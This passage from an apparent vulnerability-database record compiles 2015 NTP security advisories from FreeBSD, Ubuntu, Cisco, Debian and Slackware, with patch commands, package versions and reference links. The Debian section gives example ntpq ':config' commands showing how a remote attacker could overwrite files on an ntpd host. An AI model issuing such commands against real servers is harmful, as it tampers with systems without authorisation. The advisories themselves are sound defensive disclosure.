synchronized. [CVE-2015-7704]\n\nAn attacker which can send NTP packets to ntpd(8), can remotely crash\nthe daemon, sending malicious data packet. [CVE-2015-7855] [CVE-2015-7854]\n[CVE-2015-7853] [CVE-2015-7852] [CVE-2015-7849] [CVE-2015-7848]\n\nAn attacker which can send NTP packets to ntpd(8), can remotely\ntrigger the daemon to overwrite its configuration files. [CVE-2015-7851]\n[CVE-2015-5196]\n\nIV. Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected. Network administrators are advised to implement BCP-38,\nwhich helps to reduce risk associated with the attacks. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nThe ntpd service has to be restarted after the update. A reboot is\nrecommended but not required. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nThe ntpd service has to be restarted after the update. A reboot is\nrecommended but not required. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.2]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.bz2\n# bunzip2 ntp-102.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.asc\n# gpg --verify ntp-102.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.bz2\n# bunzip2 ntp-101.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.asc\n# gpg --verify ntp-101.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.bz2\n# bunzip2 ntp-93.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.asc\n# gpg --verify ntp-93.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# find contrib/ntp -type f -empty -delete\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in https://www.FreeBSD.org/handbook/makeworld.html. \n\nd) For 9.3-RELEASE and 10.1-RELEASE an update to /etc/ntp.conf is recommended,\nwhich can be done with help of the mergemaster(8) tool on 9.3-RELEASE and\nwith help of the etcupdate(8) tool on 10.1-RELEASE. \n\nRestart the ntpd(8) daemon, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/9/ r289998\nreleng/9.3/ r290001\nstable/10/ r289997\nreleng/10.1/ r290000\nreleng/10.2/ r289999\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\nhttps://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\n\nVII. References\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n\nThe latest revision of this advisory is available at\nhttps://security.FreeBSD.org/advisories/FreeBSD-SA-15:25.ntp.asc\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIcBAEBAgAGBQJWLhOJAAoJEO1n7NZdz2rn91wP/2GwEt1boNQq2a7nYzv/mS5D\nsYKkIi7o+2yr2BLXvtc3O7c9QC3/YeGsza9DTRqndcY572SWvRgtkFstMTTm8IV/\nRVlIE40gVR3tex0zo7BiD7uKUrxWxWcpwMbE5dzlE+vSybyyj0dSSkwUHJjrbJoA\nRmyNuEEUhQn5sRCg6qJv/PLp2G7BcYAasKScukjm7QnLP2kq/tvM9mcqwfh2tadM\n7kbf8uq+ykvsRzctaDnxQaB5+zJxBQYJjBelxQfIkNek0XGfdj3sRwISeFznbllq\nmOLTIBaFiuEtHtusO7MKKavMgS5CQJOvuuvd/l3NY1MnxC6X/1SWig9KIKDIn/hv\nq8dsnq7LLx+tO6Cv4Dub7EbC2ZP3xXGOC4Ie02z8bTZnbX7iwyPUidQQqtU9ra15\nrxzFcZnBxu+yyMNJVsV2qVV/r9OycgKxWlEELC1wYrK9fKfvLdA5aEGjDeU1Z+s6\nJS2zKr0t4F2bMrCsjYP1lQD8sHkCVjwJk+IJU/slcwSajDjBNlMH0yBxGYE1ETIZ\nqMF7/PAkLe8V78pdYmXw9pcaPyhI+ihPLnNrdhX8AI2RX5jDK7IuUNJeUM04UrVB\n8N+mMwgamcuCPWNNyXaL0bz21fexZOuhHmU+B8Yn3SFX5O5b/r9gGvrjo8ei8jOk\nEUlBT3ViDhHNrI7PTaiI\n=djPm\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2783-1\nOctober 27, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. (CVE-2015-5146)\n\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig\ndirectives. (CVE-2015-5194)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics\ntypes. (CVE-2015-5195)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain file\npaths. (CVE-2015-5196, CVE-2015-7703)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain packets. (CVE-2015-5219)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled restarting after hitting a panic threshold. \n(CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)\n\nIt was discovered that NTP incorrectly handled memory when processing\ncertain autokey messages. \n(CVE-2015-7701)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled rate limiting. (CVE-2015-7704,\nCVE-2015-7705)\n\nYves Younan discovered that NTP incorrectly handled logfile and keyfile\ndirectives. (CVE-2015-7850)\n\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled\nascii conversion. (CVE-2015-7852)\n\nYves Younan discovered that NTP incorrectly handled reference clock memory. \nA malicious refclock could possibly use this issue to cause NTP to crash,\nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-7853)\n\nJohn D \"Doug\" Birdwell discovered that NTP incorrectly handled decoding\ncertain bogus values. (CVE-2015-7855)\n\nStephen Gray discovered that NTP incorrectly handled symmetric association\nauthentication. (CVE-2015-7871)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu8.1\n\nUbuntu 15.04:\n ntp 1:4.2.6.p5+dfsg-3ubuntu6.2\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.6\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2783-1\n CVE-2015-5146, CVE-2015-5194, CVE-2015-5195, CVE-2015-5196,\n CVE-2015-5219, CVE-2015-5300, CVE-2015-7691, CVE-2015-7692,\n CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704,\n CVE-2015-7705, CVE-2015-7850, CVE-2015-7852, CVE-2015-7853,\n CVE-2015-7855, CVE-2015-7871\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6\n. \n\nOn October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server\u0027s advertised time. \n\nWorkarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details. \n\nCVE-2015-5194\n\n It was found that ntpd could crash due to an uninitialized\n variable when processing malformed logconfig configuration\n commands. \n\nCVE-2015-5195\n\n It was found that ntpd exits with a segmentation fault when a\n statistics type that was not enabled during compilation (e.g. \n timingstats) is referenced by the statistics or filegen\n configuration command\n\nCVE-2015-5219\n\n It was discovered that sntp program would hang in an infinite loop\n when a crafted NTP packet was received, related to the conversion\n of the precision value in the packet to double. \n\nCVE-2015-5300\n\n It was found that ntpd did not correctly implement the -g option:\n\n Normally, ntpd exits with a message to the system log if the offset\n exceeds the panic threshold, which is 1000 s by default. This\n option allows the time to be set to any value without restriction;\n however, this can happen only once. If the threshold is exceeded\n after that, ntpd will exit with a message to the system log. This\n option can be used with the -q and -x options. \n\n ntpd could actually step the clock multiple times by more than the\n panic threshold if its clock discipline doesn\u0027t have enough time to\n reach the sync state and stay there for at least one update. If a\n man-in-the-middle attacker can control the NTP traffic since ntpd\n was started (or maybe up to 15-30 minutes after that), they can\n prevent the client from reaching the sync state and force it to step\n its clock by any amount any number of times, which can be used by\n attackers to expire certificates, etc. \n\n This is contrary to what the documentation says. Normally, the\n assumption is that an MITM attacker can step the clock more than the\n panic threshold only once when ntpd starts and to make a larger\n adjustment the attacker has to divide it into multiple smaller\n steps, each taking 15 minutes, which is slow. \n\nCVE-2015-7701\n\n A memory leak flaw was found in ntpd\u0027s CRYPTO_ASSOC. \n\nCVE-2015-7703\n\n Miroslav Lichvar of Red Hat found that the :config command can be\n used to set the pidfile and driftfile paths without any\n restrictions. A remote attacker could use this flaw to overwrite a\n file on the file system with a file containing the pid of the ntpd\n process (immediately) or the current estimated drift of the system\n clock (in hourly intervals). For example:\n\n ntpq -c \u0027:config pidfile /tmp/ntp.pid\u0027\n ntpq -c \u0027:config driftfile /tmp/ntp.drift\u0027\n\n In Debian ntpd is configured to drop root privileges, which limits\n the impact of this issue. \n\nCVE-2015-7704\n\n If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet\n from the server to reduce its polling rate, it doesn\u0027t check if the\n originate timestamp in the reply matches the transmit timestamp from\n its request. An off-path attacker can send a crafted KoD packet to\n the client, which will increase the client\u0027s polling interval to a\n large value and effectively disable synchronization with the server. A\n specially crafted configuration file could cause an endless loop\n resulting in a denial of service. \n\nCVE-2015-7852\n\n A potential off by one vulnerability exists in the cookedprint\n functionality of ntpq. A specially crafted buffer could cause a\n buffer overflow potentially resulting in null byte being written out\n of bounds. \n\nCVE-2015-7871\n\n An error handling logic error exists within ntpd that manifests due\n to improper error condition handling associated with certain\n crypto-NAK packets. An unauthenticated, off-path attacker can force\n ntpd processes on targeted servers to peer with time sources of the\n attacker\u0027s choosing by transmitting symmetric active crypto-NAK\n packets to ntpd. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:4.2.6.p5+dfsg-2+deb7u6. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p4+dfsg-3. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p4+dfsg-3. \n\nWe recommend that you upgrade your ntp packages. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes\n several low and medium severity vulnerabilities. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ne0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ndb0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz\n\nSlackware x86_64 -current package:\n8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2015-7855" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "BID", "id": "77283" }, { "db": "VULMON", "id": "CVE-2015-7855" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "138803" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" } ], "trust": 2.61 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40840", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7855" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-7855", "trust": 3.5 }, { "db": "BID", "id": "77283", "trust": 2.0 }, { "db": "SECTRACK", "id": "1033951", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-497656", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-21-103-11", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "40840", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU96269392", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-007707", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201510-575", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10711", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-15-356-01", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-7855", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134082", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134102", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134034", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134162", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134137", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7855" }, { "db": "BID", "id": "77283" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "138803" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "CNNVD", "id": "CNNVD-201510-575" }, { "db": "NVD", "id": "CVE-2015-7855" } ] }, "id": "VAR-201708-0038", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.17692308 }, "last_update_date": "2024-07-23T21:39:15.769000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Bug\u00a01274264", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug2922" }, { "title": "NTP Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=119785" }, { "title": "Red Hat: CVE-2015-7855", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-7855" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2783-1" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=e70fe4cd19746222a97e5da53d3d2b2a" }, { "title": "Debian Security Advisories: DSA-3388-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=61fe4252a877d02aaea1c931efa0a305" }, { "title": "Symantec Security Advisories: SA103 : October 2015 NTP Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=f5e05389a60d3a56f2a0ad0ec21579d9" }, { "title": "Cisco: Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151021-ntp" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "afl-cve", "trust": 0.1, "url": "https://github.com/mrash/afl-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7855" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "CNNVD", "id": "CNNVD-201510-575" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 }, { "problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "NVD", "id": "CVE-2015-7855" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1274264" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.8, "url": "https://www.exploit-db.com/exploits/40840/" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/77283" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/ntpbug2922" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05270839" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1033951" }, { "trust": 1.7, "url": "http://www.debian.org/security/2015/dsa-3388" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171004-0001/" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-497656.pdf" }, { "trust": 1.7, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-103-11" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu96269392/index.html" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.4, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151021-ntp" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05270839" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.3, "url": "https://github.com/ntp-project/ntp/blob/stable/news#l295" }, { "trust": 0.3, "url": "http://www.ntp.org" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10711" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": "http://learn.extremenetworks.com/rs/641-vmv-602/images/vn-2015-009_multiple_ntp_vulnerabilities.pdf" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/oct/113" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005779" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099260" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099225" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7702" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7851" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7701" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7855" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7852" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7850" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7854" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7849" }, { "trust": 0.2, "url": 